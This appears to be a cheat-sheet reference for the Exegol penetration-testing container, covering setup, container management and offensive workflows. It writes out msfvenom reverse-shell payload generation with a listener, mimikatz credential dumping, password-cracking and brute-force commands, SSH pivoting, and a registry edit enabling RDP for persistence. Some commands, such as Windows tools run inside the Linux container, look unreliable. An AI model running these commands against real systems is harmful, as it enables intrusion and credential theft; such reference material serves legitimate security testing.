Exegol
Installation
Docker Installation (Linux/macOS)
# Clone Exegol repository
git clone https://github.com/ThePorgs/exegol.git
cd exegol
# Install Python dependencies
pip install -r requirements.txt
# Or use the setup script
bash exegol-install.shDocker Installation (Windows with WSL2)
# Install Docker Desktop with WSL2 backend
# Then follow Linux instructions within WSL2
# Clone and setup
git clone https://github.com/ThePorgs/exegol.git
cd exegol
pip install -r requirements.txtBasic Commands
| Command | Description |
|---|---|
exegol list | List available images and workspaces |
exegol info | Display version and information |
exegol start <name> | Start an Exegol container |
exegol stop <name> | Stop a running container |
exegol shell <name> | Open shell into a running container |
exegol remove <name> | Remove a workspace |
exegol exec <name> <command> | Execute command in container |
Image Management
Available Images
# List available Docker images
exegol list
# Pull a specific image (enterprise, full, minimal, light)
exegol pull --all # Pull all images
exegol pull -t full # Pull full image
exegol pull -t minimal # Pull minimal image
exegol pull -t light # Pull lightweight image
exegol pull -t enterprise # Pull enterprise imageCreating Workspaces
# Create a new workspace with interactive setup
exegol create
# Create workspace with specific image
exegol create -t full my_workspace
exegol create -t minimal my_workspace
exegol create -t light my_workspace
# Create with custom resource limits
exegol create -t full --cpu 4 --memory 8192 my_workspaceContainer Management
Starting Containers
# Start interactive container
exegol start my_workspace
# Start container in background
exegol start -d my_workspace
# Start with specific tag/version
exegol start -t full my_workspace
# Start and automatically enter shell
exegol start --shell my_workspaceManaging Running Containers
# View running containers
docker ps | grep exegol
# Execute command in running container
exegol exec my_workspace whoami
# Open shell in running container
exegol shell my_workspace
# View container logs
docker logs my_workspace
# Inspect container details
docker inspect my_workspacePre-installed Tools
Reconnaissance & Enumeration
# DNS enumeration
nmap -sV target.com
dig target.com
dnsenum target.com
whois target.com
fierce -dns target.com
# Web reconnaissance
nikto -h target.com
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://target.com/FUZZ
# Domain enumeration
sublist3r -d target.com
amass enum -d target.comExploitation Frameworks
# Metasploit Framework
msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe
# Empire/PSEmpire
empire
# Mimikatz for credential extraction
mimikatz.exe
privilege::debug
token::whoamiPost-Exploitation Tools
# Privilege escalation enumeration
LinEnum.sh
unix-privesc-check
PSUpgrade-Get.ps1
# Living off the land binaries
LOLBins
# Windows tools
psexec
psloggedon
wmic
reg queryCredential Tools
# Password attacks
hashcat -m 1000 -a 0 hashes.txt wordlist.txt
john --format=NT hashes.txt
hydra -l admin -P wordlist.txt http-post-form://target.com
# Credential dumping (from Exegol)
mimikatz.exe "privilege::debug" "token::whoami" "sekurlsa::logonpasswords"Network & Tunnel Tools
# Network pivoting
sshuttle -r user@pivot.host 10.0.0.0/8
proxychains4 nmap -sV target.internal
# SSH tunneling
ssh -D 1080 -f -C -q -N user@pivot.host
ssh -L 3306:internal-db.com:3306 user@pivot.host
# VPN tools
openvpn client.ovpnWorkspace Configuration
Custom Setup
# Mount local directory in container
exegol start --share /home/user/pentests my_workspace
# Set environment variables
exegol start --env PROXY=http://proxy.com:8080 my_workspace
# Configure resource limits
exegol create -t full --cpu 8 --memory 16384 enterprise_workspacePersistence & Customization
# Install additional tools in workspace
exegol exec my_workspace apt update && apt install -y tool-name
# Run custom installation script
exegol exec my_workspace bash /path/to/script.sh
# Copy files to workspace
docker cp localfile.txt my_workspace:/root/Practical Workflows
Reconnaissance and Enumeration
#!/bin/bash
# Comprehensive reconnaissance workflow
TARGET="target.com"
WORKSPACE="recon_workspace"
# Start workspace
exegol start $WORKSPACE
# DNS enumeration
exegol exec $WORKSPACE dig +short $TARGET
exegol exec $WORKSPACE nslookup -type=MX $TARGET
# Subdomain enumeration
exegol exec $WORKSPACE sublist3r -d $TARGET -o subdomains.txt
# Port scanning
exegol exec $WORKSPACE nmap -sV -p- $TARGET > nmap_results.txt
# Web scanning
exegol exec $WORKSPACE nikto -h http://$TARGET > nikto_results.txtExploitation Workflow
#!/bin/bash
# Metasploit exploitation workflow
WORKSPACE="exploit_workspace"
TARGET="10.0.0.5"
LHOST="10.0.0.1"
LPORT="4444"
exegol start $WORKSPACE
# Generate payload
exegol exec $WORKSPACE msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=$LHOST LPORT=$LPORT -f exe -o payload.exe
# Start MSFConsole and handler
exegol exec $WORKSPACE msfconsole -x \
"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; \
set LHOST $LHOST; set LPORT $LPORT; run"Post-Exploitation and Persistence
#!/bin/bash
# Post-exploitation workflow
WORKSPACE="post_exploit_workspace"
TARGET="10.0.0.10"
exegol start $WORKSPACE
# Enumerate system
exegol exec $WORKSPACE systeminfo
exegol exec $WORKSPACE whoami /all
exegol exec $WORKSPACE Get-ChildItem -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Recurse
# Extract credentials (requires SYSTEM privileges)
exegol exec $WORKSPACE mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
# Enable Remote Desktop for persistence
exegol exec $WORKSPACE reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fVolume and File Management
Mounting and Sharing
# Create named volume for persistent data
docker volume create exegol_data
# Mount volume when starting
exegol create --volumes exegol_data:/root/data my_workspace
# Copy files between host and container
docker cp /local/path/file.txt my_workspace:/root/
docker cp my_workspace:/root/results.txt /local/path/
# Mount entire directory for collaboration
docker run -v /path/to/projects:/root/projects -it exegol bashNetworking Configuration
Bridging and Exposing Services
# Create custom Docker network
docker network create exegol_net
# Run container on custom network
docker run --network exegol_net --name exegol -it exegol:full bash
# Expose ports for listener services
docker run -p 4444:4444 -p 8080:8080 --name exegol -it exegol:full bash
# Connect to internal services
docker run --network container:exegol_workspace -it exegol bashProxying and Routing
# Setup SOCKS proxy in container
exegol exec my_workspace ssh -D 1080 user@pivot.host
# Use proxychains to route traffic
exegol exec my_workspace proxychains4 nmap -sV 10.0.0.0/24
# Configure proxychains
# Edit /etc/proxychains4.conf in container:
# socks5 127.0.0.1 1080Advanced Usage
Custom Image Building
# Clone repository to build custom image
git clone https://github.com/ThePorgs/exegol.git
cd exegol
# Modify Dockerfile for custom tools
vim Dockerfile
# Build custom image
docker build -t exegol:custom .
# Create workspace with custom image
exegol create -t custom my_custom_workspaceMulti-Workspace Management
# List all workspaces
exegol list
# Manage multiple concurrent workspaces
exegol start workspace1 workspace2 workspace3
# Execute same command across workspaces
for ws in workspace1 workspace2 workspace3; do
exegol exec $ws nmap -sV 10.0.0.0/24 > results_$ws.txt
doneContainer Orchestration
# Run multiple containers with docker-compose
cat > docker-compose.yml <<EOF
version: '3'
services:
c2:
image: exegol:full
container_name: exegol_c2
volumes:
- ./tools:/root/tools
- ./payloads:/root/payloads
ports:
- "4444:4444"
- "8080:8080"
proxy:
image: exegol:minimal
container_name: exegol_proxy
networks:
- exegol_net
EOF
docker-compose up -dTroubleshooting
Common Issues
Docker daemon not running
# Start Docker daemon
sudo systemctl start docker
# Or on macOS
open -a DockerPermission denied for Docker
# Add current user to docker group
sudo usermod -aG docker $USER
# Apply new group membership
newgrp docker
# Log out and back inContainer out of disk space
# Check Docker disk usage
docker system df
# Prune unused volumes and images
docker system prune -a --volumes
# Increase Docker storage
# Edit ~/.docker/daemon.json:
# {"storage-opts": ["dm.basesize=20G"]}Network connectivity issues
# Check container network
docker inspect my_workspace | grep -A 10 NetworkSettings
# Test connectivity
exegol exec my_workspace ping 8.8.8.8
exegol exec my_workspace curl -I https://google.com
# Restart networking
docker network inspect bridge
docker network disconnect bridge my_workspace
docker network connect bridge my_workspacePerformance Tuning
Resource Optimization
# Limit resource usage at container creation
exegol create -t full \
--cpu 4 \
--memory 8192 \
--cpuset-cpus 0-3 \
optimized_workspace
# Monitor resource usage
docker stats my_workspace
# Adjust limits on running container
docker update --memory 16g --memory-swap 16g my_workspaceStorage Optimization
# Use tmpfs for temporary files
docker run --tmpfs /tmp:rw,size=1g,exec -it exegol bash
# Optimize layer caching when building
# Use Docker BuildKit for better caching
DOCKER_BUILDKIT=1 docker build -t exegol:custom .Best Practices
- Keep Exegol images updated regularly for latest tool versions
- Use separate workspaces for different engagement types
- Mount evidence directories as read-only to prevent accidental modification
- Run container with resource limits to prevent host system impact
- Clean up old containers and volumes to save disk space
- Document custom configurations and toolsets
- Use version control for custom Dockerfiles and scripts
- Isolate Exegol on separate network for sensitive testing
References
- Exegol GitHub Repository
- Exegol Documentation
- Docker Documentation
- Penetration Testing Tools Reference
Last updated: 2026-03-30